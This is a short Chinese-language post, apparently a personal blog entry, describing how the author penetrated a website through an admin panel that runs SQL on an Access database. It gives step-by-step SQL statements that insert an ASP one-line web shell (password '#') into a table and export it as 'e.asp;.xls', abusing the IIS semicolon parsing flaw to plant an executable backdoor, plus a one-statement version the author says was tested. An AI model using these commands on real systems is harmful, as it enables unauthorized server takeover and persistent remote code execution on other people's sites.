今天渗透了一个站点，后台有能执行sql语句的地方，恰好又得到了网站物理路径

以前看到网上有用access导出shell的方法，原理大致和php网站的outfile差不多

先将一句话写到数据库中，然后再通过语句写到文件中

这里要将数据表内容导出到一个EXCEL文件中，因为ACCESS数据库不允许导出其他危险格式。我们导出为EXCEL后再利用IIS解析漏洞就可以用客户端连接了

需要执行如下操作：

（1）create table a (b varchar(50))

建立一个有一个b字段的表，表名为a,字段类型为字符,长度为50

（2）insert into a (b) values('<%execute request(chr(35))%>')

在表a的b字段插入密码为#的一句话木马

（3）select * into [b] in 'd:\......\e.asp;.xls' 'excel 4.0;' from a

把表a的内容导出为e.asp;xlsdrop

其实上述3个语句用一句就可以实现：

SELECT '<%execute request(chr(35))%>' into [user] in 'd:\......\e.asp;.xls' 'excel 8.0;' from [user]

我对上面的方法在本地都测试了下，是可以实现的，并且可以用一句话客户端链接并执行（IIS+win2003）。

当然由于服务器权限的限制，实际操作时也有不成功的可能